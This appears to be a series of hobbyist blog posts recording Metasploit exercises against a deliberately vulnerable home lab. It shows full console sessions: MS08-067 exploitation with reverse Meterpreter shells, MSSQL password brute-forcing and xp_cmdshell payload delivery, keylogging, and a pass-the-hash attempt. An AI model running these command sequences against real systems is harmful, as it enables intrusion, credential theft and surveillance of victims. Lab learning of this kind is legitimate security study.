If, like me, you are reading books on Penetration Testing, it is highly likely that some of the information is out of date.

In The Basics of Hacking and Penetration Testing the author arrives at an ‘Exploitation Framework’ called Metasploit. The author uses adjectives such as: Favourite, Quintessential, Powerful, Flexible, Awesomness, Coolest, to describe this tool. It certainly caught my attention, so much so, I went on to purchase Metasploit: The Penetration Tester’s Guide

One of the first things we are advised to do with this tool is update it. The technique for this is the ‘msfupdate’ command within the msfconsole. Trouble is, this no longer works. It’s horrible encountering problems at the first hurdle and so I thought I’d share the solution.

I found the solution here and it’s very straightforward.. In Backtrack 5, start msfpro, then pop https://localhost:3790 into your browser and you’ll (eventually) be greeted with a form; fill this in, opt for Metasploit Community Edition and grab yourself a product key. Your browser may give a security warning, ignore this and ‘proceed anyway’.

Update the software and you’re good to go.

You can find a handy troubleshotting guide here.

OK, it’s time for me to begin my discovery of Metasploit.

This is a framework tool for developing and executing exploit code against remote target machines.

I’ve read Metasploit should be used like a surgeons scalpel or sniper rifle, rather than a bludgeoning hatchet or splatter gun as noobies are prone to do.

In view of this I’ve purchased Metasploit: The Penetration Tester’s Guide. I’m determined to learn this tool inside out and avoid simply becoming a script kiddie and am embarking on learning the programming language Ruby upon which Metasploit is built.

Early on in the book it is said:

The proper use and setup of a hacking lab is vital because one of the most effective means to learn something is by doing that thing.

And this is exactly where I have started.

I managed to scrounge and old desktop from a friend which had the requisite Windows XP Pro Service Pack 2 (unpatched). The firewall and software updates have been switched off. The Microsoft Internet Information Services (IIS) (server) and FTP service enabled.  SQL Server 2005 Express downloaded and configured, and a vulnerable web app up and running.

Also a virtual Ubuntu 9.04 ‘Jaunty Jackalope’ operating system set up on the host machine. I ‘bridged’ the internet connection so the router treats this as another physical machine and allocates it a network IP address.

All of this was set up as per the instructions of the book.

Obviously all of this is software is outdated, but I’m hoping exploiting the vulnerabilities using Metasploit will afford me valuable and useful experience of using this tool in a safe environment.

I’ll let you know how I get on.

Both The Basics of Hacking and Penetration Testing and Metasploit: The Penetration Tester’s Guide introduce us early on to the port scanner Nmap.

Nmap Network Scanning describe the tool thus:

Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

You can read roughly half of this book online for free here.

It’s worth noting at the outset the Nmap book assumes basic familiarity with TCP/IP and networking concepts. The TCP/IP Guide is recommended, but before buying, a free online version is available. This is an extremely lengthy guide, but if you’re starting from the place of near complete ignorance as I was, then I do recommend spending time reading it.

You can run Nmap in Backtrack/Karli by simply typing ‘nmap’ in the terminal.

Here is the output from an Nmap scan (nmap -Pn -sS ipaddress) of the Windows system on my Virtual Hacking Lab:

Host is up (0.24s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
912/tcp open apex-mesh
1025/tcp open NFS-or-IIS
1433/tcp open ms-sql-s

When I performed the scan again adding the -A flag which attempts advanced service enumeration and banner grabbing, giving even more details of the target; results included:

80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Metasploit Sample Web Attack Site
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM

Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

With all of this information at hand, exploiting the system would be a breeze.

Nmap results can be imported into Metasploit.

Metasploit has an inbuilt ‘targeted’ scanner designed specifically to attempt to identify Microsoft Windows versions on networks, called smb_version module.

SMB stands for Server Message Block and Wiki says this:

In computer networking, Server Message Block (SMB), also known as Common Internet File System (CIFS) operates as an application-layer network protocol mainly used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows, where it was known as “Microsoft Windows Network” before the subsequent introduction of Active Directory. Corresponding Windows services are the “Server Service” (for the server component) and “Workstation Service” (for the client component).

OK, let’s see how the scan performs on my Virtual Hacking Lab.

Once inside the msf Console:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS ipaddress
RHOSTS => ipaddress
msf auxiliary(smb_version) > run

Output:

ipaddress is running Windows XP Service Pack 2 (language: English) (name:LAB) (domain:WORKGROUP)

This Metasploit scan was more precise and accurate than the Nmap scan, which although correctly identified the OS system as Windows XP, could not determine if it was Service Pack two, or three.

Metasploit has an inbuilt module – mssql_ping – designed specifically to scan for Microsoft SQL servers on a network.

So, let’s see how it performs against my Virtual Hacking Lab.

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS ipaddress
RHOSTS => ipaddress
msf auxiliary(mssql_ping) > run

Output:

[*] SQL Server information for ipaddress:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Pretty comprehensive I’m sure you’ll agree. The SQL Server name, version and the TCP port on which it is listening.

Metasploit has an inbuilt module – ftp_version – designed specifically to scan for File Transfer Protocol services (FTP) on a network.

Let’s see how it performs against my Virtual Hacking Lab:

msf > use scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ftp_version) > set THREADS 255
THREADS => 255
msf auxiliary(ftp_version) > run

Output:

192.168.1.79:21 FTP Banner: ’220 Microsoft FTP Service\x0d\x0a’

So, the FTP service has been identified, but does it allow anonymous login?

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(anonymous) > set Threads 50
Threads => 50
msf auxiliary(anonymous) > run

Output:

192.168.1.79:21 Anonymous READ (220 Microsoft FTP Service)

Yep, Metasploit has detected the FTP service can be read by anyone. I was expecting Metasploit to identify anonymous write access also, but for some reason it didn’t pick this up.

Metasploit has an in-built auxiliary module designed to sweep for Simple Network Management Protocol: snmp_enum.

Let’s see how it performs against my virtual hacking lab:

msf auxiliary(snmp_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(snmp_login) > run

Output:

[*] :161SNMP – [001/118] – 192.168.1.79:161 – SNMP – Trying public… [+] SNMP: 192.168.1.79 community string: ‘public’ info: ‘Hardware: x86 Family 15 Model 2 Stepping 7 AT/AT COMPATIBLE – Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)’

So, the Metasploit scanner does detect SNMP but didn’t uncover public and private strings, but I’m sure the information provided may be useful in some way.

It is possible to write a custom scanner using Metasploit Framework ‘mixins’ and Ruby programming, but that’s too advanced for me and so I will conduct a simple vulnerability scan on my Virtual Hacking Lab.

This Metasploit scan uses Netcat to banner grab on port 80:

msf > netcat
[*] exec: netcat

Cmd line: 192.168.1.79 80
run

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1
Date: Sun, 19 May 2013 09:04:37 GMT
Content-Type: text/html
Content-Length: 87

As you can see the Web server and version is identified on Port 80.

Now to download and install NeXpose (Non-commercial Community Version) a powerful vulnerability scanner from the same people (Rapid7) that bring us Metasploit.

OK, I’m a couple of months into this cyber-security hobby and the one thing I’ve learned most keenly, is how much there is to learn. The learning curve is steep and vast and a little overwhelming at times. But one small step at a time.

I seem to have zoned in on OWASP’s Broken Web Apps, Metasploit and Ruby programming, but there is one other area that I have to begin to tackle at this point; namely, networks. In view of this, and contrary to this post, I’m going to take the plunge and purchase Wireshark Network Analysis by Laura Chappell which is quite expensive as well as expansive at around 1000 pages. I’m hoping to learn from this not just about Wireshark, but about networks, packets, protocols, and so on.

I hope it’s the correct decision; it’s difficult to know the right direction without someone pointing the way.

Just tried out the Metasploit username and password checker: SMB Login Check Scanner against my Virtual Hacking Lab.

I confess that I’m unsure as to the practical applications of this feature, as the known login password and username are inputted.

Here’s the results against the Windows portion of the Virtual Hacking Lab:

msf > use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(smb_login) > set SMBUser Lab1
SMBUser => Lab1
msf auxiliary(smb_login) > set SMBPass password
SMBPass => password
msf auxiliary(smb_login) > run

[*] 192.168.1.79:445 SMB – Starting SMB login bruteforce
[-] 192.168.1.79:445 SMB – [1/3] – FAILED LOGIN (Windows 5.1) Lab1 : [STATUS_LOGON_FAILURE]
[-] 192.168.1.79:445 SMB – [2/3] – FAILED LOGIN (Windows 5.1) Lab1 : Lab1 [STATUS_LOGON_FAILURE]
[-] 192.168.1.79:445 SMB – [3/3] – FAILED LOGIN (Windows 5.1) Lab1 : password [STATUS_LOGON_FAILURE]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see this failed, as did every attempt and derivation. So I switched focus to the Ubuntu portion of the hacking lab, to see if I’d have a better outcome:

msf auxiliary(smb_login) > set RHOSTS 192.168.1.80
RHOSTS => 192.168.1.80
msf auxiliary(smb_login) > set SMBUser ubuntulab
SMBUser => ubuntulab
msf auxiliary(smb_login) > set SMBPass whatever
SMBPass => whatever
msf auxiliary(smb_login) > run

[*] 192.168.1.80:445 SMB – Starting SMB login bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And that’s all it gave me.

So, all in all, a disappointing failure.

I shall attempt my first exploit and target the Windows portion of my Virtual Hacking Lab. I’m following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up is to scan the ports with Nmap from within Metasploit:

nmap -sT -A –script=smb-check-vulns –script-args=unsafe=1 -P0 192.168.1.79

I have run an Nmap scan against this before using different switches; however, this time, included in the results is:

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive

Obviously the ‘MS08-067: VULNERABLE’ is the pertinent result and so on to the exploit:

I searched Metasploit for the vulnerability:

msf > search MS08-067

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
Name: exploit/windows/smb/ms08_067_netapi
Disclosure Date: 2008-10-28
Rank:great
Description: Microsoft Server Service Relative Path Stack Corruption

So, to the attack:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp (This has the target machine connect to the attacking machine)

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name
– —-
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)

….SNIP….

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3 (I know from Nmap scan the Operating System details)
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79 (Target machine)
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70 (Attacking Machine)
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080 (Attacking machine’s listening port)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080

[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:8080 -> 192.168.1.79:1036) at 2013-06-02 10:06:42 +0100

meterpreter > shell
Process 2236 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And there it is, in all its glory, an interactive command shell. I now have complete control over the target machine.

Obviously the Virtual Hacking Lab target is deliberately configured vulnerable and the operating system is old and unpatched with no firewall; still, really enjoyed testing out Metasploit for the first time and getting the desired result.

Just a quick post to identify a frustrating problem in Metasploit: The Penetration Tester’s Guide.

Chapter five – The Joy of Exploitation – “Exploiting an Ubuntu Machine” simply doesn’t work. The book assumes Ubuntu 9.04 ‘Jaunty Jackalope’ Operating System comes installed with Apache and Samba, which it doesn’t.  ’Apt-Get Install’ doesn’t work and I have not found a solution to this online.

This is all Nmap could offer:

All 1000 scanned ports on ubuntulab.home are closed

Too many fingerprints match this host to give specific OS details

Apparently, this version of Ubuntu comes with all ports closed by default. I’ve tried opening ports, turning off the firewall (I believe off is default), installing software, dual booting, using another VM and so on.

Nothing worked.

I don’t think this exploit is worth the time it would take to configure the necessary vulnerabilities in Ubuntu 9.04. It also feels counterintuitive to expend a great deal of effort making something hackable.

I’m targeting ports on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The object of this is for Metasploit to uncover open ports on the victim machine. My input is in bold:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > search ports
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/misc/wol normal UDP Wake-On-Lan (WOL)
auxiliary/admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/bnat/bnat_router normal BNAT Router
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP “XMas” Port Scanner
auxiliary/scanner/rservices/rexec_login normal rexec Authentication Scanner
auxiliary/scanner/rservices/rlogin_login normal rlogin Authentication Scanner
auxiliary/scanner/rservices/rsh_login normal rsh Authentication Scanner
auxiliary/scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
auxiliary/server/http_ntlmrelay normal HTTP Client MS Credential Relayer
exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
exploit/multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
exploit/multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
exploit/multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
exploit/windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
exploit/windows/browser/crystal_reports_printcontrol 2010-12-14 normal Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
exploit/windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
exploit/windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
exploit/windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
exploit/windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
exploit/windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
exploit/windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
exploit/windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
exploit/windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
exploit/windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
exploit/windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
payload/windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
payload/windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
payload/windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
payload/windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
payload/windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_network normal Linux Gather Network Information
post/solaris/gather/checkvm normal Solaris Gather Virtual Environment Detection
post/windows/gather/checkvm normal Windows Gather Virtual Environment Detection
post/windows/manage/clone_proxy_settings normal Windows Manage Proxy Setting Cloner

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

msf exploit(ms08_067_netapi) > sessions -1 -v

Active sessions
===============

Id Type Information Connection Via
– —- ———– ———- —
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ LAB 192.168.1.70:1 -> 192.168.1.79:1053 (192.168.1.79) exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

This line:

[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

Shows me that my attacking machine is using port 1053 on the victim machine.

I’m targeting the MS MSQL Server on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 6 (Meterpreter) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Fist step: Nmap scan from within Metasploit: The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Servce Pack, but of course I know it’s Service Pack 2.

MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

And the scan confirms this.

Now to use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Lots of information here, now to brute force MS SQL with mssql_login:

>msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed.

Now to use the mssql_payload which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)

[....]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

So I’m inside the target machine with the Meterpreter shell.

In my next post I will explore what to do next with Meterpreter.

This post follows on from a previous post in which the target machine was exploited and a Meterpreter shell obtained.

First to export an image of the target machine’s desktop:

meterpreter > screenshot
Screenshot saved to: /root/hikMIGNN.jpeg

And here’s the result:

I mus say seeing this was rather satisfying!

And now for system information:

meterpreter > sysinfo
Computer : LAB
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Perfect.

Listing the processes:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
544 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
572 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
596 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
668 1032 inetinfo.exe

[...]

1820  1772  explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE

Now to “migrate” to explorer.exe:

meterpreter > migrate 1820
[*] Migrating from 3740 to 1820…
[*] Migration completed successfully.

Time for keystroke logging:

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against LAB
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
[*] Recording keystrokes…
^C[*] Saving last few keystrokes…
[*] Interrupt
[*] Stopping keystroke sniffer…

Whilst the keystroke logger was running I typed a few things on the target machine, and so in a new terminal, let’s see if the keystrokes have been logged:

:~# cat /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
Keystroke log started at 2013-06-13 11:20:10 +0100
OK this search on Google is
to determine if the Metas
ploit keyy <Back> logger is wo
rking <Back> <Return> <Return> Is any of
this being typed in Notepad
being recorded on the attacki <Back>
ng machine? <Return> <Return> Don’t know yet
, but will find out in a min! <Return> <Return>

Success, every keystroke on the target machine has indeed been recorded on the attacking machine.

Probably my favourite blog title so far.

Following on from the Hashdump post in which I obtained the Windows passwords in the form of hashes and then decrypted them for the password, the following uses the hashes to login without the need for decryption:

msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(psexec) > set SMBPass 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
SMBPass => 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] Connecting to the server…
[*] Authenticating to 192.168.1.79:445|WORKGROUP as user ”…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

As you can see this completely failed, which did not take me by surprise since every time I have attempted to use the SMB command against this Windows system, it has failed.

No idea why.

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > ps <–Lists applications running

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
192 1032 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
468 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
512 1032 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnat.exe
536 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
580 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
588 1032 vmnetdhcp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnetdhcp.exe
680 1032 vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Player\vmware-authd.exe
696 1032 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
788 128 explorer.exe x86 0 LAB\Lab1 C:\WINDOWS\Explorer.EXE
860 536 wscntfy.exe x86 0 LAB\Lab1 C:\WINDOWS\system32\wscntfy.exe
892 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
964 892 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
988 892 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
